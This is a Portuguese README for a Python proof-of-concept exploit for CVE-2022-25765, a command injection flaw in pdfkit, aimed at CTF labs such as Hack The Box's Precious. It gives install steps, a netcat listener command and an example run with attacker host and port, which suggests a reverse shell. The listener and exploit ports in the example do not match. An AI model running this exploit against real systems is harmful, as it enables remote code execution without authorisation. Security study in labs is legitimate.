
Prova de conceito em Python para CVE-2022-25765, uma vulnerabilidade de injeção de comandos no pdfkit, que permite execução remota de código por meio de geração de PDF manipulada.
PoC para CVE-2022-25765, que afeta versões vulneráveis do pdfkit.
Testado com pdfkit 0.8.6.
requestscoloramaInstale as dependências:
pip3 install -r requirements.txt
Ou manualmente:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
Exemplo: Execute um listener
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
Clone o repositório:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
Instale os requisitos:
pip3 install -r requirements.txt
Execute o PoC contra o seu alvo de laboratório.
CVE-2022-25765 é uma vulnerabilidade de injeção de comandos em versões vulneráveis do pdfkit.
O problema está relacionado à sanitização insuficiente da entrada controlada pelo usuário passada ao processo de geração de PDF.
Este PoC foi feito principalmente para aprendizado e ambientes de CTF/laboratório.
Se você está procurando um lugar para testá-lo, Hack The Box: Máquina: Precious.
Use isto apenas contra sistemas que você possui ou para os quais tem permissão explícita para testar.
Não sou responsável por uso indevido ou danos causados por este projeto.
INNOCENTx0